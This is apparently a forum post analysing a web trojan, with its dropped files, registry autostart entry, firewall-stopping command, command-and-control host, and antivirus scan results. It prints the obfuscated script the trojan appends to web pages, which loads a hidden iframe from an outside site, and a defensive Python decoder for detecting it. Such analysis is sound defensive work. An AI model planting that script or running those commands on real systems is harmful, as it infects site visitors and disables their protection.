Saw this message on FF.. so I pulled the web page apart..
Turns out it's our "old friend" 刺客集团 (the "Assassin Group").. I've dealt with web trojans generated by this group many times already..
One of the things it plants is a trojan:
hxxp://www.es86.com/pic/ddb/2006692151148920.gif
So let's do an analysis of it..
Running the sample.
Drops a file:
C:\win30.exe
Invokes cmd to run the command: /c net stop sharedaccess (stops the Windows Firewall / Internet Connection Sharing service)
Connects to the host:
61.129.102.79
The address should be hxxp://www.es86.com, talking over port 80
Downloads: hxxp://www.es86.com/es86/db/dvbbs.mdb
This file is actually a RAR archive..
dvbbs.mdb extracts to the following files:
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eCompress.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eImgConverter.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eLIB.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\HideProc.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\internet.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\krnln.fnr
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\mop
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\moz
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\Nhook.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\shell.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe
Writes to the registry (autostart entry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe"
Appends the following code to the end of .htm and .aspx files:
<script>
p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>
Decoded, the written-out payload is:
<script>
p="<iframe height=0 width=0 src=\"http://a-l.meibu.com/\"></iframe>";
document.write(p);</script>
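A defender-side decoder for the appended script above, added here as an example and not part of the original post: it pulls the numeric fromCharCode list out of a page without evaluating anything, decodes it the way String.fromCharCode would, and reports any iframe the payload writes along with whether it is zero-sized. The sample input is the injected block quoted above, embedded as a constructed string.

```python
import re

# Constructed sample: the <script> block the trojan appends to .htm/.aspx files, as quoted above.
INJECTED_PAGE = '''<html><body>site content</body></html>
<script>
p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>'''

# A quoted, comma-separated run of decimal char codes (the argument later fed to fromCharCode).
CHARCODE_LIST_RE = re.compile(r'"((?:\d{1,5}\s*,\s*)+\d{1,5})"')
IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
ZERO_SIZE_RE = re.compile(r"""\b(?:height|width)\s*=\s*["']?0\b""", re.I)


def decode_charcodes(blob):
    """Decode '60,105,...' exactly as String.fromCharCode would (each code truncated to 16 bits)."""
    return "".join(chr(int(code) & 0xFFFF) for code in blob.split(","))


def extract_payloads(html):
    """Return the decoded text of every fromCharCode-style list in the page, without any eval."""
    return [decode_charcodes(m.group(1)) for m in CHARCODE_LIST_RE.finditer(html)]


def find_injected_iframes(html):
    """Report (src, zero_sized) for each iframe written by an obfuscated payload in the page."""
    found = []
    for payload in extract_payloads(html):
        for m in IFRAME_TAG_RE.finditer(payload):
            tag = m.group(0)
            src = SRC_RE.search(tag)
            found.append((src.group(1) if src else None, bool(ZERO_SIZE_RE.search(tag))))
    return found


if __name__ == "__main__":
    for src, hidden in find_injected_iframes(INJECTED_PAGE):
        print(f"iframe src={src} zero-sized={hidden}")
```

Run over a web root's .htm/.aspx files, an empty result for every file is the expected clean state; a zero-sized iframe pointing off-site is the infection marker described in this write-up.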
Online scan results:
Scanner      Version        Date        Result
AntiVir      7.3.1.38       03.02.2007  TR/Crypt.NSPM.Gen
BitDefender  7.2            03.02.2007  DeepScan:Generic.Malware.PWYddldPk.D212BB22
eSafe        7.0.14.0       02.28.2007  suspicious Trojan/Worm
F-Secure     6.70.13030.0   03.02.2007  W32/Downloader
Ikarus       T3.1.1.3       03.02.2007  Backdoor.Win32.Hupigon.BV
NOD32v2      2090           03.02.2007  a variant of Win32/Delf.AG
Norman       5.80.02        03.02.2007  W32/Downloader
Panda        9.0.0.4        03.01.2007  Suspicious file
All of the above analysis was done inside a virtual machine..
The packer on this one I really couldn't get off.. so I couldn't look at it in more detail..
But my guess is it's written in Borland Delphi 6.0-7.0
It probably also tries to shut down some security software..
=.= sighing once again.. what a lousy packer..